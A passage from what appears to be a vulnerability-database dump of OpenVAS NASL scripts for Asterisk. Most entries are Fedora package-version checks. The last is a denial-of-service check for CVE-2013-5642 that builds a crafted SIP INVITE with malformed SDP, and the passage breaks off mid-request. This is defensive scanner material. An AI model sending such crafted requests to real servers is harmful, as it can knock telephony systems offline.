(c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.2.0~1.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:38:28", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-01-31T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-0992", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310865264", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865264", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-0992\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/097815.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865264\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-31 09:24:41 +0530 (Thu, 31 Jan 2013)\");\n script_cve_id(\"CVE-2012-5976\", \"CVE-2012-5977\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"FEDORA\", value:\"2013-0992\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-0992\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'asterisk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"asterisk on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~1.8.20.0~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:38:18", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-01-31T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-0994", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310865254", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865254", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-0994\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/097762.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865254\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-31 09:24:23 +0530 (Thu, 31 Jan 2013)\");\n script_cve_id(\"CVE-2012-5976\", \"CVE-2012-5977\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"FEDORA\", value:\"2013-0994\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-0994\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'asterisk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"asterisk on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~10.12.0~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2018-01-23T13:10:25", "description": "Check for the Version of asterisk", "cvss3": {}, "published": "2013-01-31T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-0994", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2018-01-23T00:00:00", "id": "OPENVAS:865254", "href": "http://plugins.openvas.org/nasl.php?oid=865254", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-0994\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"asterisk on Fedora 17\";\ntag_insight = \"Asterisk is a complete PBX in software. It runs on Linux and provides\n all of the features you would expect from a PBX and more. Asterisk\n does voice over IP in three protocols, and can interoperate with\n almost all standards-based telephony equipment using relatively\n inexpensive hardware.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/097762.html\");\n script_id(865254);\n script_version(\"$Revision: 8494 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-23 07:57:55 +0100 (Tue, 23 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-31 09:24:23 +0530 (Thu, 31 Jan 2013)\");\n script_cve_id(\"CVE-2012-5976\", \"CVE-2012-5977\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"FEDORA\", value: \"2013-0994\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-0994\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of asterisk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~10.12.0~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-18T11:09:41", "description": "Check for the Version of asterisk", "cvss3": {}, "published": "2013-01-31T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-1003", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2018-01-18T00:00:00", "id": "OPENVAS:865273", "href": "http://plugins.openvas.org/nasl.php?oid=865273", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-1003\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_solution = \"Please Install the Updated Packages.\";\ntag_insight = \"Asterisk is a complete PBX in software. It runs on Linux and provides\n all of the features you would expect from a PBX and more. Asterisk\n does voice over IP in three protocols, and can interoperate with\n almost all standards-based telephony equipment using relatively\n inexpensive hardware.\";\ntag_affected = \"asterisk on Fedora 18\";\n\n\n\n\nif(description)\n{\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/097760.html\");\n script_id(865273);\n script_version(\"$Revision: 8456 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-18 07:58:40 +0100 (Thu, 18 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-31 09:25:06 +0530 (Thu, 31 Jan 2013)\");\n script_cve_id(\"CVE-2012-5976\", \"CVE-2012-5977\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-1003\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-1003\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of asterisk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.2.0~1.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-18T11:09:11", "description": "Check for the Version of asterisk", "cvss3": {}, "published": "2013-01-31T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-0992", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2018-01-17T00:00:00", "id": "OPENVAS:865264", "href": "http://plugins.openvas.org/nasl.php?oid=865264", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-0992\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"asterisk on Fedora 16\";\ntag_insight = \"Asterisk is a complete PBX in software. It runs on Linux and provides\n all of the features you would expect from a PBX and more. Asterisk\n does voice over IP in three protocols, and can interoperate with\n almost all standards-based telephony equipment using relatively\n inexpensive hardware.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/097815.html\");\n script_id(865264);\n script_version(\"$Revision: 8448 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 17:18:06 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-31 09:24:41 +0530 (Thu, 31 Jan 2013)\");\n script_cve_id(\"CVE-2012-5976\", \"CVE-2012-5977\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"FEDORA\", value: \"2013-0992\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-0992\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of asterisk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~1.8.20.0~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-26T11:10:29", "description": "Check for the Version of asterisk", "cvss3": {}, "published": "2013-04-08T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-4528", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2264", "CVE-2013-2686"], "modified": "2018-01-26T00:00:00", "id": "OPENVAS:865538", "href": "http://plugins.openvas.org/nasl.php?oid=865538", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-4528\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"asterisk on Fedora 17\";\ntag_insight = \"Asterisk is a complete PBX in software. It runs on Linux and provides\n all of the features you would expect from a PBX and more. Asterisk\n does voice over IP in three protocols, and can interoperate with\n almost all standards-based telephony equipment using relatively\n inexpensive hardware.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(865538);\n script_version(\"$Revision: 8542 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-26 07:57:28 +0100 (Fri, 26 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-04-08 10:33:25 +0530 (Mon, 08 Apr 2013)\");\n script_cve_id(\"CVE-2013-2686\", \"CVE-2013-2264\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-4528\");\n\n script_xref(name: \"FEDORA\", value: \"2013-4528\");\n script_xref(name: \"URL\" , value: \"http://lists.fedoraproject.org/pipermail/package-announce/2013-April/101684.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of asterisk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~10.12.2~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:38:08", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-04-08T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-4528", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2264", "CVE-2013-2686"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310865538", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865538", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-4528\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.865538\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-04-08 10:33:25 +0530 (Mon, 08 Apr 2013)\");\n script_cve_id(\"CVE-2013-2686\", \"CVE-2013-2264\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-4528\");\n script_xref(name:\"FEDORA\", value:\"2013-4528\");\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-April/101684.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'asterisk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"asterisk on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~10.12.2~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:38:21", "description": "This host is running Asterisk Server and is prone to denial of service\n vulnerability.", "cvss3": {}, "published": "2013-10-28T00:00:00", "type": "openvas", "title": "Asterisk Products Invalid SDP SIP Channel Driver DoS Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5642"], "modified": "2019-03-05T00:00:00", "id": "OPENVAS:1361412562310802063", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802063", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_asterisk_invalid_sdp_dos_vuln.nasl 13994 2019-03-05 12:23:37Z cfischer $\n#\n# Asterisk Products Invalid SDP SIP Channel Driver DoS Vulnerability\n#\n# Authors:\n# Veerendra G.G <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:digium:asterisk\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802063\");\n script_version(\"$Revision: 13994 $\");\n script_cve_id(\"CVE-2013-5642\");\n script_bugtraq_id(62022);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-05 13:23:37 +0100 (Tue, 05 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-10-28 15:06:58 +0530 (Mon, 28 Oct 2013)\");\n script_name(\"Asterisk Products Invalid SDP SIP Channel Driver DoS Vulnerability\");\n script_category(ACT_DENIAL);\n script_copyright(\"This script is Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"secpod_asterisk_detect.nasl\");\n script_mandatory_keys(\"Asterisk-PBX/Installed\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/54534\");\n script_xref(name:\"URL\", value:\"https://issues.asterisk.org/jira/browse/ASTERISK-22007\");\n script_xref(name:\"URL\", value:\"http://downloads.asterisk.org/pub/security/AST-2013-005.html\");\n\n script_tag(name:\"summary\", value:\"This host is running Asterisk Server and is prone to denial of service\n vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send invalid SDP SIP request and check is it vulnerable to DoS or not.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Asterisk Open Source to 1.8.23.1, 10.12.3, 11.5.1 or later,\n Certified Asterisk to 1.8.15-cert3, 11.2-cert2 or later,\n Asterisk Digiumphones 10.12.3-digiumphones or later.\");\n\n script_tag(name:\"insight\", value:\"Error within the SIP channel driver when handling a crafted SDP in a SIP\n request.\");\n\n script_tag(name:\"affected\", value:\"Asterisk Open Source 1.8.x to 1.8.23.0, 10.x to 10.12.2 and 11.x to 11.5.0\n Certified Asterisk 1.8.15 to 1.8.15-cert2 and 11.2 to 11.2-cert1\n Asterisk Digiumphones 10.x-digiumphones to 10.12.2-digiumphones\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to cause a denial of\n service via a crafted SDP in a SIP request.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_xref(name:\"URL\", value:\"http://www.asterisk.org\");\n exit(0);\n}\n\ninclude(\"sip.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit( 0 );\n\nif( ! infos = get_app_location_and_proto( cpe:CPE, port:port ) )\n exit( 0 );\n\nproto = infos[\"proto\"];\nif( ! sip_alive( port:port, proto:proto ) )\n exit( 0 );\n\nhost_name = get_host_name();\nthis_host = this_host();\n\nvtstrings = get_vt_strings();\nuseragent = vtstrings[\"default\"];\n\ncon_data = string(\"v=0\", \"\\r\\n\",\n \"o=user1 53655765 2353687637 IN IP4\", this_host,\"\\r\\n\",\n \"s=-\", \"\\r\\n\",\n \"t=0 0\", \"\\r\\n\",\n \"m=audio 6000 RTP/AVP 8 0\", \"\\r\\n\",\n \"m=video 6002 RTP/AVP 31\", \"\\r\\n\",\n \"c=IN IP4\", this_host);\n\ncraf_req = string( \"INVITE sip:test@\", host_name, \":\", port, \" SIP/2.0\", \"\\r\\n\",\n \"Via: SIP/2.0/\", toupper( proto ), \" \", this_host, \":\", port,\";branch=z9hG4bK-25912-1-0\",\"\\r\\n\",\n \"From: test1 <sip:guest0@\", this_host, \":\", port, \";tag=1\", \"\\r\\n\",\n \"To: test <sip:test@\", host_name, \":\", port, \">\", \"\\r\\n\",\n 